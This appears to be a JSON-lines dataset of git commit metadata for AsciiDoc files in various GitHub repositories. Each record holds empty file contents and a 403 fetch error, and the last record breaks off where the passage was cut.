readme\n","repos":"aparnachaudhary\/prototypes,juangon\/prototypes","old_file":"jaxrs-db-access\/README.adoc","new_file":"jaxrs-db-access\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/aparnachaudhary\/prototypes.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"739b02cdc937d40f86f51c39446959d9052aaf6c","subject":"copied components.adoc from a real project","message":"copied components.adoc from a real project\n","repos":"kontext-e\/uneven-modules","old_file":"jqassistant\/components.adoc","new_file":"jqassistant\/components.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kontext-e\/uneven-modules.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"63246a5e6fef181e62ab7eecbf617f9c1a10a475","subject":"Add missing changes","message":"Add missing changes\n","repos":"mstahv\/framework,mstahv\/framework,mstahv\/framework,Darsstar\/framework,Darsstar\/framework,Darsstar\/framework,asashour\/framework,mstahv\/framework,asashour\/framework,mstahv\/framework,asashour\/framework,asashour\/framework,Darsstar\/framework,asashour\/framework,Darsstar\/framework","old_file":"documentation\/articles\/VaadinScalabilityTestingWithAmazonWebServices.asciidoc","new_file":"documentation\/articles\/VaadinScalabilityTestingWithAmazonWebServices.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mstahv\/framework.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5b023b3124f49651b05087da37e8cff00aceb36a","subject":"Minor docs fixes","message":"Minor docs fixes\n\nFixed monospace formatting in a couple of places. `Phrase` formatting\nhad to be changed to ``letter``.\n\nFixed a few typos.\n","repos":"raphw\/spock,paplorinc\/spock,psideleau\/spock,lokinell\/spock,psideleau\/spock,sebi-hgdata\/spock,alien11689\/spock,siordache\/spock,alien11689\/spock,paplorinc\/spock,paplorinc\/spock,spockframework\/spock,raphw\/spock,sebi-hgdata\/spock,raphw\/spock,leonard84\/spock,psideleau\/spock,siordache\/spock,alien11689\/spock,siordache\/spock,lokinell\/spock,sebi-hgdata\/spock,lokinell\/spock","old_file":"docs\/interaction_based_testing.adoc","new_file":"docs\/interaction_based_testing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sebi-hgdata\/spock.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1386c0c2e447e0ed91fe5f9bfdf808e7169fe675","subject":"Update 2016-10-09-What-I-like-about-Japan.adoc","message":"Update 2016-10-09-What-I-like-about-Japan.adoc","repos":"endymion64\/VinJBlog,endymion64\/endymion64.github.io,endymion64\/VinJBlog,endymion64\/endymion64.github.io,endymion64\/VinJBlog,endymion64\/VinJBlog,endymion64\/endymion64.github.io,endymion64\/endymion64.github.io","old_file":"_posts\/2016-10-09-What-I-like-about-Japan.adoc","new_file":"_posts\/2016-10-09-What-I-like-about-Japan.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/endymion64\/endymion64.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0d91bbcfcf4212ecad98a9ca16427bbdd5029f18","subject":"Update 2016-07-28-2016-07-28.adoc","message":"Update 2016-07-28-2016-07-28.adoc","repos":"tamakinkun\/tamakinkun.github.io,tamakinkun\/tamakinkun.github.io,tamakinkun\/tamakinkun.github.io,tamakinkun\/tamakinkun.github.io","old_file":"_posts\/2016-07-28-2016-07-28.adoc","new_file":"_posts\/2016-07-28-2016-07-28.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tamakinkun\/tamakinkun.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3e3ae8dffa0fc39a19e1896dcfc6dc914f01c474","subject":"Update 2017-05-16-Faster-IDE.adoc","message":"Update 2017-05-16-Faster-IDE.adoc","repos":"miroque\/shirokuma,miroque\/shirokuma,miroque\/shirokuma,miroque\/shirokuma","old_file":"_posts\/2017-05-16-Faster-IDE.adoc","new_file":"_posts\/2017-05-16-Faster-IDE.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/miroque\/shirokuma.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a10cda04e8eff26f91ba374c393f1bee6d5288fc","subject":"Update 2018-07-26-Scratch.adoc","message":"Update 2018-07-26-Scratch.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-07-26-Scratch.adoc","new_file":"_posts\/2018-07-26-Scratch.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d6471eeb5f23a2a94da9a9918d2ccba1dae7b62d","subject":"Added Aerogear configuration snippets","message":"Added Aerogear configuration snippets\n","repos":"pilhuhn\/hawkular.github.io,hawkular\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,metlos\/hawkular.github.io,pilhuhn\/hawkular.github.io,metlos\/hawkular.github.io,lzoubek\/hawkular.github.io,ppalaga\/hawkular.github.io,jpkrohling\/hawkular.github.io,tsegismont\/hawkular.github.io,lucasponce\/hawkular.github.io,jotak\/hawkular.github.io,objectiser\/hawkular.github.io,jpkrohling\/hawkular.github.io,metlos\/hawkular.github.io,objectiser\/hawkular.github.io,lucasponce\/hawkular.github.io,jpkrohling\/hawkular.github.io,lucasponce\/hawkular.github.io,jpkrohling\/hawkular.github.io,objectiser\/hawkular.github.io,hawkular\/hawkular.github.io,jotak\/hawkular.github.io,jotak\/hawkular.github.io,tsegismont\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,lzoubek\/hawkular.github.io,ppalaga\/hawkular.github.io,jsanda\/hawkular.github.io,jsanda\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,lucasponce\/hawkular.github.io,jotak\/hawkular.github.io,tsegismont\/hawkular.github.io,pilhuhn\/hawkular.github.io,metlos\/hawkular.github.io,lzoubek\/hawkular.github.io,lzoubek\/hawkular.github.io,pilhuhn\/hawkular.github.io,jsanda\/hawkular.github.io,ppalaga\/hawkular.github.io,objectiser\/hawkular.github.io,ppalaga\/hawkular.github.io,hawkular\/hawkular.github.io,tsegismont\/hawkular.github.io,hawkular\/hawkular.github.io,jsanda\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/blog\/2015\/04\/09\/alert-notifiers-for-mobile-devices.adoc","new_file":"src\/main\/jbake\/content\/blog\/2015\/04\/09\/alert-notifiers-for-mobile-devices.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"00d9caaad753bf737e47e4da21d37c3e13eea21b","subject":"Add Code of Conduct","message":"Add Code of Conduct\n","repos":"spring-cloud\/spring-cloud-dataflow-admin-cloudfoundry,markfisher\/spring-cloud-dataflow-admin-cloudfoundry,spring-cloud\/spring-cloud-dataflow-server-cloudfoundry,spring-cloud\/spring-cloud-dataflow-server-cloudfoundry,spring-cloud\/spring-cloud-dataflow-server-cloudfoundry,spring-cloud\/spring-cloud-dataflow-admin-cloudfoundry,markfisher\/spring-cloud-dataflow-admin-cloudfoundry,markfisher\/spring-cloud-dataflow-admin-cloudfoundry,spring-cloud\/spring-cloud-dataflow-admin-cloudfoundry","old_file":"CODE_OF_CONDUCT.adoc","new_file":"CODE_OF_CONDUCT.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/spring-cloud\/spring-cloud-dataflow-server-cloudfoundry.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0f627d1fa5dd824c23897f84512d0851e77a0e9c","subject":"Add code of conduct","message":"Add code of conduct\n","repos":"dtrunk90\/spring-social-facebook,spring-projects\/spring-social-facebook,spring-projects\/spring-social-facebook,dtrunk90\/spring-social-facebook","old_file":"CODE_OF_CONDUCT.adoc","new_file":"CODE_OF_CONDUCT.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a1fa3d240c760874727bb4c1c07065cf0b46bcc3","subject":"Chaged readme to reflect wiki install instructions","message":"Chaged readme to reflect wiki install instructions\n","repos":"lillian-lemmer\/hypatia,hypatia-software-org\/hypatia-engine,Applemann\/hypatia,Applemann\/hypatia,hypatia-software-org\/hypatia-engine,brechin\/hypatia,lillian-lemmer\/hypatia,brechin\/hypatia","old_file":"readme.asciidoc","new_file":"readme.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lillian-lemmer\/hypatia.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f2585877aa0ed949ef19dcd7e7e9e93fe7fe71dd","subject":"Moving to asciidoc","message":"Moving to asciidoc\n","repos":"kurron\/jvm-development-environment,kurron\/jvm-development-environment","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kurron\/jvm-development-environment.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c7225d27b548be0ef7b0d6906de64265a77d7415","subject":"[doc] More IDs + use NOTES for \"since\" informations","message":"[doc] More IDs + use NOTES for \"since\" informations\n","repos":"netceler\/pipeline-maven-plugin,jenkinsci\/pipeline-maven-plugin,netceler\/pipeline-maven-plugin,jenkinsci\/pipeline-maven-plugin","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/netceler\/pipeline-maven-plugin.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7d8cf6c16fbb7ca4166676a9626ecec57f336168","subject":"Create README.adoc","message":"Create README.adoc","repos":"asciidoctor\/docker-asciidoctorj","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/asciidoctor\/docker-asciidoctorj.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"767dec2e04f19259c1867d5146aa3bda40bab408","subject":"Beg someone to make GUI in readme","message":"Beg someone to make GUI in readme\n","repos":"lassik\/extract,lassik\/extract","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lassik\/extract.git\/': The requested URL returned error: 403\n","license":"isc","lang":"AsciiDoc"} {"commit":"65d8b2fa30fe24918c54b93bbc0b67c010f19d09","subject":"Better in-doc reference","message":"Better in-doc reference\n","repos":"cmpitg\/programming-language-notes","old_file":"Common-Lisp.adoc","new_file":"Common-Lisp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"a3e4b411e1c872cf5b2169afa19c2fe4cd4d08f2","subject":"CL: Add \"Retriving argument list of a function\"","message":"CL: Add \"Retriving argument list of a function\"\n","repos":"cmpitg\/programming-language-notes","old_file":"Common-Lisp.adoc","new_file":"Common-Lisp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"fc4ebea253483edce4c5041420eecb33d8e1c7be","subject":"add clojurex","message":"add clojurex\n","repos":"clojure\/clojure-site","old_file":"content\/events\/2019\/clojurex.adoc","new_file":"content\/events\/2019\/clojurex.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"5de7099e7fcf8a610a7a6a1dffe3cd55d2fc778d","subject":"add README.md","message":"add README.md\n","repos":"marzelwidmer\/angular-springboot,marzelwidmer\/angular-springboot,marzelwidmer\/angular-springboot,marzelwidmer\/angular-springboot,marzelwidmer\/angular-springboot","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/marzelwidmer\/angular-springboot.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"10d318031726f143764c38101feabfda34b6439a","subject":"add success stories content","message":"add success stories content\n","repos":"clojure\/clojure-site","old_file":"content\/community\/success_stories.adoc","new_file":"content\/community\/success_stories.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"91b78bfedbb6e92acc0cdfb314ab45879337c025","subject":"Update 2015-04-17-React.adoc","message":"Update 2015-04-17-React.adoc","repos":"hatohato25\/hatohato25.github.io,hatohato25\/hatohato25.github.io,hatohato25\/hatohato25.github.io","old_file":"_posts\/2015-04-17-React.adoc","new_file":"_posts\/2015-04-17-React.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hatohato25\/hatohato25.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d02147a19a5488a5eb815cb17056227a6d92f2a0","subject":"Update 2017-05-03-Intro.adoc","message":"Update 2017-05-03-Intro.adoc","repos":"kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io","old_file":"_posts\/2017-05-03-Intro.adoc","new_file":"_posts\/2017-05-03-Intro.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kunicmarko20\/kunicmarko20.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e4872b9e6e95293ecccd696e2f6af4d490ee8943","subject":"Update 2017-08-05-mecab.adoc","message":"Update 2017-08-05-mecab.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-08-05-mecab.adoc","new_file":"_posts\/2017-08-05-mecab.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9f330e8ff0d030dd935191a3984132988e0c7d6f","subject":"Blog post on QR Code support for Android Client","message":"Blog post on QR Code support for Android Client\n","repos":"tsegismont\/hawkular.github.io,hawkular\/hawkular.github.io,hawkular\/hawkular.github.io,jsanda\/hawkular.github.io,objectiser\/hawkular.github.io,tsegismont\/hawkular.github.io,pilhuhn\/hawkular.github.io,jsanda\/hawkular.github.io,jsanda\/hawkular.github.io,lucasponce\/hawkular.github.io,pilhuhn\/hawkular.github.io,jpkrohling\/hawkular.github.io,tsegismont\/hawkular.github.io,jotak\/hawkular.github.io,jotak\/hawkular.github.io,lucasponce\/hawkular.github.io,jpkrohling\/hawkular.github.io,jsanda\/hawkular.github.io,objectiser\/hawkular.github.io,hawkular\/hawkular.github.io,objectiser\/hawkular.github.io,lucasponce\/hawkular.github.io,tsegismont\/hawkular.github.io,jpkrohling\/hawkular.github.io,hawkular\/hawkular.github.io,pilhuhn\/hawkular.github.io,objectiser\/hawkular.github.io,jotak\/hawkular.github.io,jotak\/hawkular.github.io,lucasponce\/hawkular.github.io,pilhuhn\/hawkular.github.io,jpkrohling\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/blog\/2016\/03\/20\/qr-android.adoc","new_file":"src\/main\/jbake\/content\/blog\/2016\/03\/20\/qr-android.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0b698aa26379b0d0e9eb140f14c8a86f358888b2","subject":"y2b create post 14-Core Mac Pro Killer PC?","message":"y2b create post 14-Core Mac Pro Killer PC?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-11-10-14Core-Mac-Pro-Killer-PC.adoc","new_file":"_posts\/2015-11-10-14Core-Mac-Pro-Killer-PC.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"665d31667874af1fd08360cd7f1aaf776acc1b3b","subject":"Adding Angular-CLI documentation.","message":"Adding Angular-CLI documentation.\n\nFixes #7 #15\n","repos":"platosha\/angular-polymer,vaadin\/angular2-polymer,platosha\/angular-polymer,platosha\/angular-polymer,vaadin\/angular2-polymer","old_file":"docs\/ng-cli.adoc","new_file":"docs\/ng-cli.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/vaadin\/angular2-polymer.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e6d3836c6c08bf9a40914dac73247673aff26ca3","subject":"Update 2016-12-08-My-Development-Environment-Setup.adoc","message":"Update 2016-12-08-My-Development-Environment-Setup.adoc","repos":"faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io","old_file":"_posts\/2016-12-08-My-Development-Environment-Setup.adoc","new_file":"_posts\/2016-12-08-My-Development-Environment-Setup.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/faldah\/faldah.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"339cedf30d383695dcb97bc9de22e8bc01bd71d5","subject":"y2b create post New Trent iCarrier Unboxing (IMP120D Unboxing - External Battery)","message":"y2b create post New Trent iCarrier Unboxing (IMP120D Unboxing - External Battery)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-09-02-New-Trent-iCarrier-Unboxing-IMP120D-Unboxing--External-Battery.adoc","new_file":"_posts\/2012-09-02-New-Trent-iCarrier-Unboxing-IMP120D-Unboxing--External-Battery.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1645c67e67c1c124c2765ac1cbf1e15e60e82d15","subject":"Update README.adoc","message":"Update README.adoc","repos":"trisberg\/spring-xd-samples,morfeo8marc\/spring-xd-samples,constantlearner\/spring-xd,huunhancit\/spring-xd-samples,morfeo8marc\/spring-xd-samples,ghillert\/spring-xd-samples,felipeg48\/spring-xd-samples,spring-projects\/spring-xd-samples,constantlearner\/spring-xd,spring-projects\/spring-xd-samples,trisberg\/spring-xd-samples,huunhancit\/spring-xd-samples,rajkumargithub\/spring-xd-samples,spring-projects\/spring-xd-samples,ghillert\/spring-xd-samples,constantlearner\/spring-xd,viveksd87\/spring-xd-samples,morfeo8marc\/spring-xd-samples,ghillert\/spring-xd-samples,ghillert\/spring-xd-samples,trisberg\/spring-xd-samples,huunhancit\/spring-xd-samples,rajkumargithub\/spring-xd-samples,ghillert\/spring-xd-samples,morfeo8marc\/spring-xd-samples,viveksd87\/spring-xd-samples,spring-projects\/spring-xd-samples,viveksd87\/spring-xd-samples,spring-projects\/spring-xd-samples,huunhancit\/spring-xd-samples,felipeg48\/spring-xd-samples,felipeg48\/spring-xd-samples,viveksd87\/spring-xd-samples,rajkumargithub\/spring-xd-samples,felipeg48\/spring-xd-samples,felipeg48\/spring-xd-samples,morfeo8marc\/spring-xd-samples,constantlearner\/spring-xd,rajkumargithub\/spring-xd-samples,spring-projects\/spring-xd-samples,trisberg\/spring-xd-samples,rajkumargithub\/spring-xd-samples,constantlearner\/spring-xd,viveksd87\/spring-xd-samples,trisberg\/spring-xd-samples,ghillert\/spring-xd-samples,huunhancit\/spring-xd-samples,morfeo8marc\/spring-xd-samples,viveksd87\/spring-xd-samples,rajkumargithub\/spring-xd-samples,huunhancit\/spring-xd-samples,constantlearner\/spring-xd,felipeg48\/spring-xd-samples,trisberg\/spring-xd-samples","old_file":"analytics-pmml\/README.adoc","new_file":"analytics-pmml\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/constantlearner\/spring-xd.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"72ea1b97f1ea672bcf235c084784d39b82836750","subject":"Update 2015-05-18-A-Remplacer.adoc","message":"Update 2015-05-18-A-Remplacer.adoc","repos":"Ellixo\/ellixo.github.io,Ellixo\/ellixo.github.io,Ellixo\/ellixo.github.io","old_file":"_posts\/2015-05-18-A-Remplacer.adoc","new_file":"_posts\/2015-05-18-A-Remplacer.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Ellixo\/ellixo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c515cd8c5b099e7464478daa33aec2ccf95f1ccf","subject":"Update 2015-11-05-Hello-world.adoc","message":"Update 2015-11-05-Hello-world.adoc","repos":"puff-tw\/hubpress.io,puff-tw\/hubpress.io,puff-tw\/hubpress.io","old_file":"_posts\/2015-11-05-Hello-world.adoc","new_file":"_posts\/2015-11-05-Hello-world.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/puff-tw\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ebe0c44ce21497d991e094d1b92bcaa46aad4d58","subject":"Update 2016-09-01-Swift-Tuple.adoc","message":"Update 2016-09-01-Swift-Tuple.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-09-01-Swift-Tuple.adoc","new_file":"_posts\/2016-09-01-Swift-Tuple.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"50d73c9f6c11e6b456a5d564637a7d07bc282e55","subject":"Update 2016-09-01-Swift-Tuple.adoc","message":"Update 2016-09-01-Swift-Tuple.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-09-01-Swift-Tuple.adoc","new_file":"_posts\/2016-09-01-Swift-Tuple.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e55e5d446a5dde24fd0eaf3fe372628341a3e7ea","subject":"Update 2018-05-19-Go-O-R-Join.adoc","message":"Update 2018-05-19-Go-O-R-Join.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-05-19-Go-O-R-Join.adoc","new_file":"_posts\/2018-05-19-Go-O-R-Join.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"39ed146cbfdcab1436cba6f7b38570f694f75dba","subject":"Add release steps","message":"Add release steps\n","repos":"spring-projects\/spring-ldap,spring-projects\/spring-ldap,spring-projects\/spring-ldap,spring-projects\/spring-ldap,spring-projects\/spring-ldap","old_file":"RELEASE.adoc","new_file":"RELEASE.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/spring-projects\/spring-ldap.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7b54406b9aed358dd5efff315be1aa06673fe063","subject":"Update 2016-04-05-Analizando-el-codigo.adoc","message":"Update 2016-04-05-Analizando-el-codigo.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-05-Analizando-el-codigo.adoc","new_file":"_posts\/2016-04-05-Analizando-el-codigo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"feb85942b3ef2a0620d3366d423fcc7cb3aded98","subject":"Update 2017-01-13-memo-like-asciidoc.adoc","message":"Update 2017-01-13-memo-like-asciidoc.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-01-13-memo-like-asciidoc.adoc","new_file":"_posts\/2017-01-13-memo-like-asciidoc.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b43345103acd38e830b6b04a3471316a604edb7f","subject":"Initial notes","message":"Initial notes\n","repos":"ECP-CANDLE\/Supervisor,ECP-CANDLE\/Supervisor,ECP-CANDLE\/Supervisor,ECP-CANDLE\/Supervisor,ECP-CANDLE\/Supervisor,ECP-CANDLE\/Supervisor","old_file":"workflows\/README.adoc","new_file":"workflows\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ECP-CANDLE\/Supervisor.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"17b9f3335181c9bbce6d95ec9dc2ea7e3c3481f5","subject":"SEC-2378: Fix CSRF MultipartFilter doc typo","message":"SEC-2378: Fix CSRF MultipartFilter doc typo\n","repos":"panchenko\/spring-security,ollie314\/spring-security,Krasnyanskiy\/spring-security,rwinch\/spring-security,panchenko\/spring-security,pwheel\/spring-security,wilkinsona\/spring-security,diegofernandes\/spring-security,zhaoqin102\/spring-security,panchenko\/spring-security,chinazhaoht\/spring-security,djechelon\/spring-security,follow99\/spring-security,ajdinhedzic\/spring-security,jgrandja\/spring-security,caiwenshu\/spring-security,adairtaosy\/spring-security,pkdevbox\/spring-security,likaiwalkman\/spring-security,rwinch\/spring-security,wilkinsona\/spring-security,jgrandja\/spring-security,pwheel\/spring-security,rwinch\/spring-security,raindev\/spring-security,yinhe402\/spring-security,rwinch\/spring-security,kazuki43zoo\/spring-security,spring-projects\/spring-security,fhanik\/spring-security,mdeinum\/spring-security,kazuki43zoo\/spring-security,djechelon\/spring-security,tekul\/spring-security,SanjayUser\/SpringSecurityPro,pwheel\/spring-security,ollie314\/spring-security,spring-projects\/spring-security,raindev\/spring-security,spring-projects\/spring-security,djechelon\/spring-security,jgrandja\/spring-security,ollie314\/spring-security,ractive\/spring-security,adairtaosy\/spring-security,tekul\/spring-security,fhanik\/spring-security,ajdinhedzic\/spring-security,liuguohua\/spring-security,forestqqqq\/spring-security,ractive\/spring-security,eddumelendez\/spring-security,Xcorpio\/spring-security,follow99\/spring-security,mparaz\/spring-security,cyratech\/spring-security,izeye\/spring-security,MatthiasWinzeler\/spring-security,MatthiasWinzeler\/spring-security,yinhe402\/spring-security,izeye\/spring-security,pkdevbox\/spring-security,driftman\/spring-security,mrkingybc\/spring-security,wkorando\/spring-security,ajdinhedzic\/spring-security,cyratech\/spring-security,jmnarloch\/spring-security,spring-projects\/spring-security,adairtaosy\/spring-security,pkdevbox\/spring-security,Peter32\/spring-security,mrkingybc\/spring-security,Krasnyanskiy\/spring-security,mparaz\/spring-security,forestqqqq\/spring-security,liuguohua\/spring-security,eddumelendez\/spring-security,thomasdarimont\/spring-security,vitorgv\/spring-security,SanjayUser\/SpringSecurityPro,olezhuravlev\/spring-security,wkorando\/spring-security,wkorando\/spring-security,ractive\/spring-security,forestqqqq\/spring-security,ajdinhedzic\/spring-security,mounb\/spring-security,mdeinum\/spring-security,jgrandja\/spring-security,raindev\/spring-security,SanjayUser\/SpringSecurityPro,olezhuravlev\/spring-security,caiwenshu\/spring-security,wilkinsona\/spring-security,spring-projects\/spring-security,forestqqqq\/spring-security,mparaz\/spring-security,xingguang2013\/spring-security,raindev\/spring-security,djechelon\/spring-security,caiwenshu\/spring-security,zgscwjm\/spring-security,zshift\/spring-security,xingguang2013\/s